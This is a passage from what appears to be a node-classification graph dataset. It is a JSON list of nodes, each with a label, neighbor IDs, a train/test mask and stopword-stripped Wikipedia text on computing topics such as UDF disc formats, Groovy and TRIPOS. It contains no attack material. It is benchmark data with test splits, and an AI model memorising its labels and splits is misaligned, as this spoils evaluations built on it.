write-once nature cd-r dvd-r media means file deleted disc file data still remains disc appear directory still occupies original space stored eventually using scheme time disc full free space recovered deleting files special tools used access previous state disc state delete occurred making recovery possible drives fully implement version 1.5 higher udf may therefore unable handle vat builds rewriteable media dvd-rw cd-rw fewer limitations dvd-r cd-r media sectors rewritten random though packets time media erased entirely time making disc blank ready writing new udf file system e.g. iso 9660 cd audio however sectors -rw media may wear meaning data becomes unreliable rewritten often typically hundred rewrites cd-rw plain vat builds udf format used rewriteable media limitations plain build used -rw media file-system level modification data must allowed would quickly wear often-used sectors disc directory block allocation data would go unnoticed lead data loss allow modification files disc rewriteable discs used like -r media using vat build ensures blocks get written successively ensuring blocks get rewritten often others way rw disc erased reused many times become unreliable however eventually become unreliable easy way detecting using vat build cd-rw/dvd-rw media effectively appears cd-r dvd+/-r media computer however media may erased time spared build added revision 1.5 address particularities rewriteable media build adds extra sparing table order manage defects eventually occur parts disc rewritten many times table keeps track worn-out sectors remaps working ones udf defect management apply systems already implement another form defect management mount rainier mrw optical discs disk controller hard drive tools drives fully support revision 1.5 udf ignore sparing table would lead read outdated worn-out sectors leading retrieval corrupted data udf specifications allow one character set osta cs0 store unicode code point excluding u+feff u+fffe additional character sets defined ecma-167 used since errata dcn-5157 range code points expanded code points unicode 4.0 newer older version includes supplementary multilingual plane characters dcn-5157 also recommends normalizing strings normalization form c. osta cs0 character set stores 16-bit unicode string compressed 8-bit 16-bit units preceded single-byte compid tag indicate compression type 8-bit storage functionally equivalent iso-8859-1 16-bit storage utf-16 big endian reference algorithm neither checks forbidden code points interprets surrogate pairs due dcn-5157 unicode string needs interpreted utf-16 represent plane 1–16 code points emoji many dvd players support udf revision version 1.02 discs created newer revision may still work players iso 9660 bridge format used even operating system claims able read udf 1.50 still may support plain build necessarily either vat spared udf builds mac os x 10.4.5 claims support revision 1.50 see man mount_udf yet mount disks plain build properly provides virtualization support mount udf disks vat seen sony mavica issue releases 10.4.11 mount disks sparing table read files correctly version 10.4.11 fixes problem similarly windows xp service pack 2 sp2 read dvd-rw discs use udf 2.00 sparing tables defect management system problem occurs udf defect management system creates sparing table spans one sector dvd-rw disc windows xp sp2 recognize dvd using udf windows explorer displays contents dvd empty folder hotfix available included service pack 3",
    "neighbors": [
      5120,
      2564,
      11270,
      5643,
      6669,
      3598,
      4624,
      10257,
      9236,
      6677,
      5142,
      8214,
      537,
      3611,
      540,
      5661,
      3102,
      9249,
      9762,
      8227,
      8740,
      5158,
      7720,
      1577,
      10281,
      2101,
      7225,
      11323,
      10812,
      62,
      3648,
      10306,
      8772,
      10310,
      1098,
      7754,
      8266,
      4173,
      4174,
      5709,
      9808,
      10828,
      4178,
      1109,
      10839,
      6233,
      603,
      9819,
      3167,
      5729,
      3170,
      10851,
      4708,
      5736,
      10857,
      11370,
      9836,
      7789,
      622,
      5231,
      5743,
      9839,
      4210,
      7796,
      9333,
      6263,
      1656,
      6265,
      7290,
      4731,
      9335,
      9848,
      9343,
      10879,
      8841,
      7818,
      139,
      6797,
      654,
      9869,
      5264,
      2193,
      2194,
      9874,
      10900,
      2197,
      8854,
      2199,
      4248,
      11419,
      7838,
      3233,
      9377,
      3235,
      4771,
      6309,
      1190,
      1703,
      5286,
      6820,
      10405,
      2221,
      5293,
      7342,
      3760,
      7344,
      8369,
      1203,
      5300,
      2230,
      7351,
      5816,
      1212,
      2749,
      8380,
      10428,
      3265,
      2244,
      8391,
      200,
      8904,
      10951,
      9420,
      1742,
      7378,
      3795,
      4819,
      7379,
      8402,
      8404,
      728,
      8410,
      6365,
      2782,
      9953,
      9442,
      739,
      4836,
      7907,
      4326,
      2279,
      4841,
      1770,
      8938,
      3308,
      10476,
      1263,
      3312,
      10993,
      3826,
      2291,
      246,
      3834,
      1791,
      3328,
      11519,
      11012,
      1801,
      2314,
      8461,
      3856,
      3857,
      1810,
      3859,
      6416,
      8977,
      3351,
      6935,
      8473,
      11033,
      11543,
      8988,
      11546,
      287,
      1825,
      6434,
      292,
      5413,
      3368,
      3881,
      5928,
      4907,
      9004,
      10024,
      302,
      7983,
      10026,
      6961,
      10029,
      6963,
      1844,
      9525,
      10039,
      6970,
      6972,
      11072,
      3394,
      11076,
      3909,
      2378,
      10570,
      4431,
      5969,
      850,
      3922,
      2391,
      4439,
      5465,
      346,
      2395,
      2397,
      2402,
      10596,
      2407,
      2919,
      10087,
      4458,
      9066,
      370,
      11123,
      11638,
      3447,
      376,
      6519,
      890,
      9593,
      11128,
      2943,
      7554,
      3462,
      1418,
      5003,
      5004,
      7565,
      8075,
      8080,
      6545,
      5013,
      11675,
      11676,
      11677,
      414,
      2462,
      2974,
      929,
      7070,
      11683,
      10151,
      3496,
      8618,
      4012,
      430,
      1454,
      432,
      8110,
      8114,
      7603,
      8115,
      10673,
      11184,
      8631,
      1464,
      6584,
      1978,
      6075,
      9655,
      960,
      8643,
      8132,
      5062,
      6088,
      969,
      3535,
      8659,
      4564,
      7126,
      2519,
      1498,
      5594,
      5596,
      478,
      2015,
      4064,
      6114,
      6115,
      1509,
      9189,
      4074,
      3053,
      2030,
      6637,
      7663,
      6641,
      9709,
      3573,
      11256,
      2555,
      3582,
      5119
    ],
    "mask": "None"
  },
  {
    "node_id": 6063,
    "label": 3,
    "text": "Interrupt_priority_level:interrupt priority level interrupt priority level ipl part current system interrupt state indicates interrupt requests currently accepted ipl may indicated hardware registers programmable interrupt controller software bitmask integer value source code threads integer based ipl may small single bit two values 0 interrupts enabled 1 interrupts disabled mos technology 6502 however architectures permit greater range values value enables interrupt requests specify higher level blocking ones lower level assigning different priorities interrupt requests useful trying balance system throughput versus interrupt latency kinds interrupts need responded quickly others amount processing might large makes sense assign higher priority kind interrupt control interrupt level also used synchronize access kernel data structures thus level-3 scheduler interrupt handler would temporarily raise ipl 7 accessing actual scheduler data structures lower back 3 actually switching process contexts however allowed interrupt handler lower ipl entered since could destroy integrity synchronization system course multiprocessor systems add complications addressed regardless hardware might support typical unix-type systems make use two levels minimum interrupts disabled maximum interrupts enabled example one elaborate ipl-handling systems ever deployed vax computer associated vms operating system supports 32 priority levels 0 31 priorities 16 requests external hardware values 16 available software interrupts used internally operating system schedule activities values actually used important ones alpha hardware contains native support ipls openvms ported itanium 2001 ipl scheme simulated using features provided itanium hardware",
    "neighbors": [
      3142,
      3272,
      4553,
      5457,
      5823,
      5523,
      7281,
      11604,
      823,
      3615
    ],
    "mask": "Test"
  },
  {
    "node_id": 6064,
    "label": 4,
    "text": "Mutual_authentication:mutual authentication mutual authentication two-way authentication refers two parties authenticating time default mode authentication protocols ike ssh optional others tls default tls protocol proves identity server client using x.509 certificate authentication client server left application layer tls also offers client-to-server authentication using client-side x.509 authentication requires provisioning certificates clients involves less user-friendly experience rarely used end-user applications mutual tls authentication mtls much widespread business-to-business b2b applications limited number programmatic homogeneous clients connecting specific web services operational burden limited security requirements usually much higher compared consumer environments mutual authentication machine-to-machine leaving chance whether users notice care remote authentication fails e.g red address bar browser padlock wrong domain name non-technical mutual-authentication also exists mitigate problem requiring user complete challenge effectively forcing notice blocking authenticating false endpoint mutual authentication two types",
    "neighbors": [
      4874,
      6794,
      10908,
      3742,
      10915,
      7338,
      10801,
      2483,
      5433,
      957,
      6975,
      3521,
      6220,
      6098,
      2274,
      10341,
      11244,
      4722,
      6904,
      2558,
      4863
    ],
    "mask": "Test"
  },
  {
    "node_id": 6065,
    "label": 3,
    "text": "SEX_(computing):sex computing computing sex assembly language mnemonic often used codice_1 machine instruction found motorola 6809 computer cpu sex also mean endianness computer architecture used x86 computers byte sex hc11 computers example functions sometimes needed computers different endianness communicate internet protocols often use big endian byte coding default rca 1802 series microprocessors sex codice_2 instruction used designate machine sixteen 16-bit registers x index register tla sex humorously said stand software exchange meaning copying software file sharing sometimes spread computer viruses stated “ illicit sex transmit viral diseases computer. ” involvement ftp servers /pub directories process led name explained contraction 'pubic",
    "neighbors": [
      7364,
      9932,
      499,
      7739,
      477
    ],
    "mask": "Test"
  },
  {
    "node_id": 6066,
    "label": 4,
    "text": "Mary_D'Imperio:mary d'imperio mary d'imperio american cryptographer introduced problem voynich manuscript john tiltman 1975 written several books journal articles manuscript include 'the voynich manuscript elegant enigma 'the voynich manuscript scholarly mystery 'an application cluster analysis multiple scaling question hands languages voynich manuscript d'imperio degrees comparative philology classics radcliffe college graduated magna cum laude structural linguistics university pennsylvania elected member phi beta kappa radcliffe 1950 according 1976 introduction vera filby career government since 1951 linguist cryptanalyst thinks mainly computer programmer 1960 1962 d'imperio created temac text macro compiler language processing text 1987 2006 frequent contributor north american breeding bird survey reports father philadelphia sculptor dominic d'imperio",
    "neighbors": [
      1941
    ],
    "mask": "Test"
  },
  {
    "node_id": 6067,
    "label": 9,
    "text": "Java_Management_Extensions:java management extensions managing monitoring applications designed developed using java dynamic management kit jsr 003 java community process defined jmx 1.0 1.1 1.2 jmx 2.0 developed jsr 255 jsr subsequently withdrawn jmx remote api 1.0 remote management monitoring specified jsr 160 extension jmx remote api web services developed jsr 262 adopted early j2ee community jmx part j2se since version 5.0 jmx trademark oracle corporation jmx uses three-level architecture applications generic consoles jconsole mc4j domain-specific monitoring applications external applications interact mbeans use jmx connectors protocol adapters connectors serve connect agent remote jmx-enabled management application form communication involves connector jmx agent connector client management application protocol adapters provide management view jmx agent given protocol management applications connect protocol adapter usually specific given protocol managed bean sometimes simply referred mbean type javabean created dependency injection managed beans particularly used java management extensions technology java ee 6 specification provides detailed meaning managed bean mbean represents resource running java virtual machine application java ee technical service transactional monitor jdbc driver etc. used collecting statistics concerns like performance resources usage problems pull getting setting application configurations properties push/pull notifying events like faults state changes push java ee 6 provides managed bean bean implemented java class called bean class top-level java class managed bean defined managed bean java ee technology specification example javaserver faces technology specification meets following conditions special declaration annotation required define managed bean mbean notify mbeanserver internal changes attributes implementing codice_3 application interested mbean changes registers listener codice_4 mbeanserver note jmx guarantee listeners receive notifications two basic types mbean additional types open mbeans model mbeans monitor mbeans open mbeans dynamic mbeans rely basic data types self-explanatory user-friendly model mbeans dynamic mbeans configured runtime generic mbean class also provided dynamically configuring resources program runtime mxbean platform mbean special type mbean reifies java virtual machine subsystems garbage collection jit compilation memory pools multi-threading etc mlet management applet utility mbean load instantiate register mbeans mbeanserver xml description format xml descriptor jmx supported various levels different vendors",
    "neighbors": [
      2304,
      7042,
      9988,
      4358,
      4233,
      3341,
      910,
      7187,
      10526,
      6433,
      8609,
      2596,
      10020,
      5031,
      5677,
      5047,
      2106,
      6074,
      4668,
      3517,
      3133,
      3518,
      3008,
      5567,
      6334,
      9665,
      10683,
      11582,
      7878,
      1095,
      6860,
      3278,
      3920,
      1363,
      3545,
      1756,
      479,
      4959,
      4960,
      1250,
      2658,
      3558,
      1128,
      3560,
      3561,
      3562,
      9834,
      5872,
      11504,
      3954,
      9078,
      3705,
      2556,
      3966,
      6143
    ],
    "mask": "None"
  },
  {
    "node_id": 6068,
    "label": 5,
    "text": "VB5_interface:vb5 interface vb5 set protocols define interface broadband user access node service node broadband equivalent v5 interface member broadband isdn architecture",
    "neighbors": [
      10626
    ],
    "mask": "None"
  },
  {
    "node_id": 6069,
    "label": 2,
    "text": "Mode_setting:mode setting mode setting software operation activates display mode screen resolution color depth refresh rate computer display controller kernel mode-setting kms display mode set kernel user-space mode-setting ums display mode set userland process kernel mode-setting flexible allows displaying error case fatal system error kernel even using user-space display server user-space mode setting would require superuser privileges direct hardware access kernel-based mode setting shuns requirement user-space graphics server microsoft windows versions nt-based use kernel mode setting kernel error display made possible kernel mode setting officially called bug check commonly known blue screen death linux kernel got prerequisite kernel-based mode setting accepting intel gem version 2.6.28 released december 2008 replaced tungstens graphics ttm translation table maps memory manager supports gem api ttm developed free open-source drivers radeon s3 graphics graphic chipsets see free open-source graphics device driver support intel gma graphic chipsets accepted version 2.6.29 released march 23 2009 support pre-r600 ati radeon graphics cards accepted version 2.6.31 released september 9 2009 support r600 r700 development within drm merged version 2.6.32 support evergreen r800 merged version 2.6.34 nvidia release needed documentation graphics chip development proceeded nouveau project uses reverse engineering build working open-source driver nvidia cards nouveau accepted version 2.6.33 kernel released december 10 2009 kernel-based mode setting supported nouveau driver required wayland compositors e.g weston kmscon depend kernel mode setting via ioctl freebsd support kernel-based mode setting gem later generations intel gpus ironlake sandybridge ivybridge starting version 9.1 netbsd support kernel-based mode setting accelerated graphics intel radeon devices implementation introduced version 7.0 porting linux 3.15 drm/kms code openbsd kernel-based mode setting support intel radeon gpus starting version 5.4 openbsd support intel gpus available release version 5.5 implementation extended add support radeon chipsets well following alternatives presented linux plumbers conference 2013",
    "neighbors": [
      2594,
      9604,
      11322,
      4902,
      4423,
      5386,
      6797,
      8976,
      7442,
      3162,
      10971,
      4636,
      10173
    ],
    "mask": "None"
  },
  {
    "node_id": 6070,
    "label": 9,
    "text": "Logical_framework:logical framework logic logical framework provides means define present logic signature higher-order type theory way provability formula original logic reduces type inhabitation problem framework type theory approach used successfully interactive automated theorem proving first logical framework automath however name idea comes widely known edinburgh logical framework lf several recent proof tools like isabelle based idea unlike direct embedding logical framework approach allows many logics embedded type system logical framework based general treatment syntax rules proofs means dependently typed lambda calculus syntax treated style similar general per martin-löf system arities describe logical framework one must provide following summarized case lf logical framework meta-language λπ-calculus system first-order dependent function types related propositions types principle first-order minimal logic key features λπ-calculus consists entities three levels objects types kinds type classes families types predicative well-typed terms strongly normalizing church-rosser property well-typed decidable however type inference undecidable logic represented lf logical framework judgements-as-types representation mechanism inspired per martin-löf development kant notion judgement 1983 siena lectures two higher-order judgements hypothetical formula_1 general formula_2 correspond ordinary dependent function space respectively methodology judgements-as-types judgements represented types proofs logical system formula_3 represented signature assigns kinds types finite set constants represents syntax judgements rule schemes object-logic rules proofs seen primitive proofs hypothetico-general judgements formula_4 implementation lf logical framework provided twelf system carnegie mellon university twelf includes",
    "neighbors": [
      6306,
      7394,
      5796,
      4455,
      11034,
      5213,
      4670
    ],
    "mask": "Test"
  },
  {
    "node_id": 6071,
    "label": 3,
    "text": "Sun_Fire_T2000:sun fire t2000 sun fire t2000 server code named ontario system engineered sun microsystems applications including web 2.0 databasing part sun fire line t2000 among first servers leverage sun coolthreads processing technology improves energy-efficiency systems introduced december 2005 sun t2000 reached end life eol november 2009 t2000 powered four-core six-core eight-core ultrasparc t1 processor supports 64 gib ecc ddr2 sdram system memory using 16 dimm slots 584 gigabytes internal storage serial attached scsi drives infoworld noted system light class 3.5 inches tall 16.7 inches wide 24.4 inches deep weighs 40 pounds t2000 offered sun preloaded solaris 10 operating system",
    "neighbors": [
      6033,
      9665,
      597,
      8863
    ],
    "mask": "Test"
  },
  {
    "node_id": 6072,
    "label": 3,
    "text": "James_A._Kahle:james a. kahle jim kahle ibm fellow chief architect many ibm power microprocessors mr. kahle born venezuela father worked oil business received b.s degree rice university 1983 working ibm since early 1980s risc-based microprocessors work started physical design tools currently concentrated risc architecture 20 years experience chip design 160 patents key defining power architecture superscalar microprocessor designs ibm forefront developing multicore designs asymmetric multiprocessors smt microarchitectures key designer rios processor launched rs/6000 family workstations servers one founders somerset design center birthplace powerpc architecture project manager powerpc 603 subsequent designs like powerpc 750 also chief architect power4 core later director technology sti design center cell technology austin texas",
    "neighbors": [
      9472,
      643,
      3846,
      398,
      6815,
      9126,
      6311,
      306,
      7218,
      10675,
      8120,
      1985,
      3025,
      6738,
      342,
      1115,
      859,
      4060,
      3677,
      9445,
      8937,
      10985,
      4587,
      5235,
      6004,
      2293,
      8700,
      1784,
      3323,
      6268,
      6909
    ],
    "mask": "Test"
  },
  {
    "node_id": 6073,
    "label": 7,
    "text": "Radek_Maneuver:radek maneuver radek maneuver scale-up-then-scale-down tactic used administration web services specifically deployed cloud computing paradigm provider e.g amazon elastic compute cloud microsoft azure developed olivier radek dabrowski mid-2010 radek maneuver originally conceived using maintaining applications running paas system radek maneuver consists series steps usually executed via paas web portal interface tactic used service misbehaving otherwise experiencing errors suspected cause underlying cloud layer rather application layer includes networking issues bad box problems steps follows scale-up-scale-down method understood shift application different physical machine underlying paas service application virtual machine layer cloud computing stack generally access application developer instead hands cloud provider maneuver allows troubleshooting dodging errors layer",
    "neighbors": [
      4194,
      10020,
      1935
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6074,
    "label": 9,
    "text": "Apache_Groovy:apache groovy apache groovy java-syntax-compatible object-oriented programming language java platform static dynamic language features similar python ruby perl smalltalk used programming language scripting language java platform compiled java virtual machine jvm bytecode interoperates seamlessly java code libraries groovy uses curly-bracket syntax similar java groovy supports closures multiline strings expressions embedded strings much groovy power lies ast transformations triggered annotations groovy 1.0 released january 2 2007 groovy 2.0 july 2012 since version 2 groovy compiled statically offering type inference performance near java groovy 2.4 last major release pivotal software sponsorship ended march 2015 groovy 2.5.8 latest stable version groovy groovy since changed governance structure project management committee apache software foundation james strachan first talked development groovy blog august 2003 march 2004 groovy submitted jcp jsr 241 accepted ballot several versions released 2004 2006 java community process jcp standardization effort began version numbering changed version called 1.0 released january 2 2007 various betas release candidates numbered 1.1 december 7 2007 groovy 1.1 final released immediately renumbered groovy 1.5 reflect many changes made 2007 groovy first prize jax 2007 innovation award 2008 grails groovy web framework second prize jax 2008 innovation award november 2008 springsource acquired groovy grails company g2one august 2009 vmware acquired springsource april 2012 eight years inactivity spec lead changed status jsr 241 dormant strachan left project silently year groovy 1.0 release 2007 oct 2016 strachan stated still love groovy jenkins pipelines groovy java go typescript kotlin july 2 2012 groovy 2.0 released among new features added static compiling static type checking pivotal software joint venture spun-off emc corporation emc vmware april 2013 groovy grails formed part product portfolio pivotal ceased sponsoring groovy grails april 2015 month groovy changed governance structure codehaus repository project management committee pmc apache software foundation via incubator groovy graduated apache incubator became top-level project november 2015 valid java files also valid groovy files although two languages similar groovy code compact need elements java needs makes possible java programmers learn groovy gradually starting familiar java syntax acquiring groovy programming idioms groovy features available java include static dynamic typing keyword codice_1 operator overloading native syntax lists associative arrays maps native support regular expressions polymorphic iteration string interpolation added helper methods safe navigation operator codice_2 check automatically null pointers example codice_3 codice_4 since version 2 groovy also supports modularity able ship needed jars according project needs thus reducing size groovy library type checking static compiling project coin syntax enhancements multicatch blocks ongoing performance enhancements using codice_5 instruction introduced java 7 groovy provides native support various markup languages xml html accomplished via inline document object model dom syntax feature enables definition manipulation many types heterogeneous data assets uniform concise syntax programming methodology unlike java groovy source code file executed uncompiled script contains code outside class definition class main method runnable groovytestcase groovy script fully parsed compiled generated executing similar perl ruby occurs hood compiled version saved artifact process groovybeans groovy version javabeans groovy implicitly generates getters setters following code codice_6 codice_7 implicitly generated last two lines appear access color directly actually calling implicitly generated methods groovy offers simple consistent syntax handling lists maps reminiscent java array syntax groovy offers support prototype extension codice_8 extension modules groovy 2 objective-c-like categories codice_9 codice_8 offers domain-specific language dsl express changes class easily similar ruby open class concept groovy changes code prototyping visible java since attribute/method invocation groovy goes metaclass registry changed code accessed java going metaclass registry groovy also allows overriding methods codice_11 codice_12 among others enabling developer intercept calls object specify action simplified aspect-oriented way following code enables class codice_13 respond codice_14 property grails framework uses metaprogramming extensively enable gorm dynamic finders like codice_15 others groovy syntax permits omitting parentheses dots situations following groovy code written enabling development domain-specific languages dsls look like plain english although groovy mostly object-oriented language also offers functional programming features according groovy documentation closures groovy work similar 'method pointer enabling code written run later point time groovy closures support free variables i.e variables explicitly passed parameter exist declaration context partial application terms 'currying delegation implicit typed untyped parameters working collections determined type closure passed operation collection inferred group expressions written closure block without reference implementation responding object assigned later point using delegation usually called partial application groovy feature allows closures parameters set default parameter arguments creating new closure bound value supplying one argument codice_16 method fix argument one supplying n arguments fix arguments 1 .. n. curry also used reverse direction fixing arguments n n 1 using codice_17 groovy also supports lazy evaluation reduce/fold infinite structures immutability among others javascript object notation json xml processing groovy employs builder pattern making production data structure less verbose example following xml generated via following groovy code also processed streaming way codice_18 change implementation json codice_19 swapped codice_20 parse search functional language groovy codice_21 method serve groovy strings interpolated variables expressions using gstrings gstrings containing variables expressions must declared using double quotes complex expression must enclosed curly brackets prevents parts interpreted belonging surrounding string instead expression expression evaluation deferred employing arrow syntax according groovy documentation groovy compiler compiles groovy scripts classes point process source code end represented memory form concrete syntax tree transformed abstract syntax tree purpose ast transformations let developers hook compilation process able modify ast turned bytecode run jvm ast transformations provides groovy improved compile-time metaprogramming capabilities allowing powerful flexibility language level without runtime performance penalty examples asts groovy among others according groovy documentation traits structural construct language allows composition behaviors runtime implementation interfaces behavior overriding compatibility static type checking/compilation traits seen interfaces carrying default implementations state trait defined using trait keyword used like normal interface using keyword codice_22 traits allow wide range abilities simple composition testing notable examples groovy adoption include many integrated development environments ides text editors support groovy one alternative implementation groovy",
    "neighbors": [
      7176,
      6153,
      2576,
      6161,
      1047,
      8217,
      9245,
      8739,
      11303,
      5677,
      2045,
      9780,
      1591,
      572,
      9789,
      6718,
      7742,
      7233,
      7750,
      8262,
      595,
      84,
      6228,
      7261,
      8799,
      2658,
      102,
      10854,
      1130,
      8810,
      2163,
      3705,
      1657,
      8825,
      7292,
      3712,
      9345,
      1673,
      10377,
      6797,
      9875,
      148,
      10387,
      155,
      8860,
      7326,
      4777,
      1203,
      692,
      8883,
      9914,
      7357,
      190,
      6338,
      1222,
      4294,
      9926,
      5833,
      6860,
      7889,
      8408,
      220,
      1250,
      228,
      10470,
      8425,
      747,
      10991,
      5872,
      2804,
      2297,
      4358,
      1296,
      786,
      5395,
      1812,
      5917,
      6941,
      8990,
      10526,
      3876,
      3877,
      7987,
      9011,
      4919,
      6458,
      1851,
      7485,
      1353,
      6474,
      8524,
      847,
      3920,
      4944,
      1363,
      10581,
      2903,
      10584,
      11098,
      6493,
      4960,
      865,
      5987,
      8549,
      6502,
      11111,
      11625,
      8554,
      3442,
      9078,
      3960,
      1913,
      3966,
      1920,
      6016,
      3462,
      8582,
      6536,
      1931,
      910,
      7567,
      9614,
      8082,
      11161,
      1435,
      6555,
      7076,
      10661,
      5031,
      428,
      4529,
      6067,
      5047,
      5048,
      4538,
      6074,
      10683,
      10684,
      3519,
      5567,
      9665,
      9666,
      8644,
      1991,
      5066,
      8139,
      10193,
      11219,
      2519,
      4056,
      9179,
      477,
      990,
      479,
      10719,
      11235,
      4069,
      9701,
      3560,
      3561,
      3562,
      7146,
      7147,
      8691,
      7159,
      11259,
      2557,
      6143
    ],
    "mask": "None"
  },
  {
    "node_id": 6075,
    "label": 2,
    "text": "TRIPOS:tripos tripos trivial portable operating system computer operating system development started 1976 computer laboratory cambridge university headed dr. martin richards first version appeared january 1978 originally ran pdp-11 later ported computer automation lsi4 data general nova work motorola 68000 version started 1981 university bath metacomco acquired rights 68000 version continued development tripos chosen commodore amiga march 1985 form part operating system new computer also used cambridge part cambridge distributed computing system july 1985 amiga introduced incorporating tripos amigados module amigaos amigados included command line interface amiga file system entire amigados module originally written bcpl ancestor c programming language language used write tripos amigados would later rewritten c amigaos 2.x onwards retaining backwards compatibility 1.x amigaos 4 completely rewritten c amigados abandoned bcpl legacy tripos provided features pre-emptive multi-tasking using strict-priority scheduling hierarchical file system multiple command line interpreters important tripos concepts non-memory-management approach meaning checks performed stop programs using unallocated memory message passing means passing pointers instead copying message contents two concepts together allowed sending receiving 1250 packets per second 10 mhz motorola 68010 cpu tripos implemented bcpl kernel device drivers implemented assembly language one notable feature tripos/bcpl cultural use shared libraries untypical time resulting small therefore fast loading utilities example many standard system utilities well 0.5 kbytes size compared typical minimum 20 kbytes functionally equivalent code modern unix linux tripos ported number machines including data general nova 2 computer automation lsi4 motorola 68000 intel 8086- based hardware included support cambridge ring local area network recently martin richards produced port tripos run linux using cintcode bcpl virtual machine january 2019 tripos still actively maintained open g ltd. formerly misys financial systems worcestershire uk many british insurance brokers linux/intel based tripos system serving networked workstations tcp/ip connection systems used run open g brooms application suite open g added number features support modern office ability integrate many mainstream applications services sql server citrix xenapp terminal servers etc following list commands supported tripos cli cintpos experimental interpretive version tripos runs cintcode bcpl virtual machine also developed martin richards",
    "neighbors": [
      2560,
      6155,
      6675,
      7187,
      9236,
      10776,
      25,
      1561,
      2073,
      4637,
      9249,
      9762,
      4643,
      6180,
      7217,
      10803,
      10809,
      576,
      2625,
      8262,
      5709,
      6221,
      3160,
      6233,
      10333,
      97,
      11363,
      7269,
      6760,
      10856,
      11370,
      9835,
      5743,
      7285,
      4727,
      9335,
      634,
      1147,
      3197,
      1150,
      5247,
      11390,
      2179,
      10883,
      10891,
      6797,
      10382,
      5264,
      2193,
      6296,
      2201,
      9370,
      9882,
      9887,
      3233,
      8876,
      8879,
      8369,
      178,
      9907,
      6837,
      6329,
      8889,
      5823,
      8388,
      1736,
      2248,
      5840,
      8402,
      1750,
      7382,
      8410,
      9946,
      9436,
      1247,
      11489,
      7403,
      242,
      5363,
      9466,
      9468,
      1278,
      1804,
      273,
      8977,
      787,
      789,
      5397,
      10016,
      292,
      10235,
      2345,
      7983,
      2355,
      7477,
      823,
      4409,
      6459,
      7483,
      7999,
      11075,
      11076,
      1349,
      4423,
      10570,
      5452,
      6988,
      5457,
      7507,
      7511,
      3426,
      8551,
      5484,
      7020,
      11123,
      5492,
      2933,
      11635,
      376,
      8573,
      7039,
      8063,
      10113,
      8069,
      394,
      3978,
      4492,
      10638,
      7057,
      5531,
      11675,
      2462,
      5022,
      421,
      1445,
      935,
      4521,
      8618,
      9643,
      4525,
      6062,
      432,
      7601,
      11184,
      8115,
      10676,
      6078,
      9151,
      451,
      11204,
      11205,
      4040,
      8136,
      9166,
      4564,
      477,
      10730,
      10731,
      8687,
      6128,
      5105,
      5619,
      5115,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 6076,
    "label": 4,
    "text": "IID_(company):iid company iid previously internet identity privately held internet security company based tacoma washington united states iid acquired all-cash transaction infoblox february 8 2016 primarily provides cyberthreat data platform exchange cyberthreat data anti-phishing malware domain control security services us federal government agencies financial service firms e-commerce social networking internet service provider isp companies microsoft uses iid data feed anti-phishing software well partner domain defense program customers include becu boeing employees ’ credit union monster.com yakima valley credit union iid founded 1996 providing outsourced domain management services 1997 company claims discovered disabled one earliest phishing attacks since iid ’ business revolved around protecting companies cyber attacks 2013 iid accepted first round institutional funding 8 million bessemer venture partners iid acquired all-cash transaction infoblox february 8 2016 activetrust iid ’ threat intelligence management system company claims gets threat data thousands sources determines data useful defend cyberattacks activetrust feeds data fortune 500 companies ’ u.s. government agencies ’ cybersecurity appliances leading iid claim activetrust world ’ largest commercial cyberthreat data exchange provides list latest malicious compromised ip addresses domains e-mail accounts identifies bad players organization connected extended enterprise activetrust data formerly known activeknowledge iid ’ threat intelligence team investigates analyzes validates threat data identify patterns trends revealing ongoing attacks future hazards ti team takes shared data activetrust uses filtering analysis add structure context detects diagnoses mitigates dns domain name system security configuration issues organization extended enterprise tool reportedly helped iid identify dns hijacking twitter december 2009 also reportedly helped find half fortune 500 companies infected dnschanger provides anti-phishing malware security solutions help organizations ensure online brands trusted mitigation formerly known activecontrol power shark iid holds leadership positions various security industry groups including anti-phishing working group apwg internet corporation assigned names numbers icann messaging anti-abuse working group maawg",
    "neighbors": [
      7515,
      507,
      3941,
      8054
    ],
    "mask": "Test"
  },
  {
    "node_id": 6077,
    "label": 3,
    "text": "Hydlide:hydlide april 28 1995 remake released sega saturn title virtual hydlide japan western countries kingdom fairyland three magic jewels enshrined palace maintain peace kingdom one day evil man broke palace stole one three magic jewels without third jewel two remaining jewels lost magic sparkle magic spell sealed power varalys vicious demon kingdom broken turmoil followed last two jewels stolen varalys cast special magic princess ann turning three fairies hid somewhere kingdom let loose horde monsters across land became ruler kingdom young knight jim stood took action restore peace kingdom bravely made way wilderness full armor fight monsters ... game created e soft tokohiro naito idea behind hydlide mix together action rpg elements new action rpg genre inspired tower druaga black onyx said black onyx direct influence hydlide design leans towards action rather role-playing hydlide essentially took tower druaga formula colorful open world added rpg mechanics naito noted completely unaware western role-playing games like ultima wizardry developing hydlide never used apple ii said became aware two japanese action rpg projects dragon slayer courageous perseus reading magazine hydlide development shocked find hydlide attempt concept underestimated dragon slayer felt threatened courageous perseus believing latter visually impressive courageous perseus turned successful whereas dragon slayer went become hydlide biggest competitor subsequent sequels hydlide initially well-received considered innovator released japan back 1984 hydlide one first action role-playing games along courageous perseus dragon slayer hydlide also early open world game rewarding exploration open world environment also ability switch attack mode defense mode quick save load options used moment game introduction health regeneration mechanic health slowly regenerates standing still sold 2 million copies japan including 1 million home computers including pc-88 pc-98 pc-66 sharp x1 fm7 msx msx2 mz-2000 1 million famicom console first computer game receive platinum award toshiba emi million sales however failed capture attention beyond japan game influential action rpg genre including titles ys example ys uses similar health-regeneration mechanic recharging health mechanic first introduced hydlide 1984 would decades later become common mechanic widely used many video games including shooter games halo hydlide open world game design inspired hideo kojima designed metal gear solid v captures open-world feel felt first played hydlide pc platinumgames director hideki kamiya inspired hydlide series cited influence scalebound open world action rpg hydlide initially released outside japan european release msx version beyond 1989 saw release localization hydlide special nes simply titled hydlide unlike dragon quest 1 improved upon us localization hydlide left essentially unaltered beyond minor changes title screen prompts/messages received negative reception often compared unfavorably legend zelda 1986 improved significantly upon hydlide nes version hydlide became notorious west repetitive background music bears similarity john williams indiana jones theme disney small world repetitive nature one two nrom single bank rpg/adventure games famicom/nes enix adventure game portopia serial murder case music hydlide several follow-ups",
    "neighbors": [
      2469,
      2249,
      3113,
      9006,
      3346,
      10931,
      11443,
      11575,
      5753
    ],
    "mask": "None"
  },
  {
    "node_id": 6078,
    "label": 2,
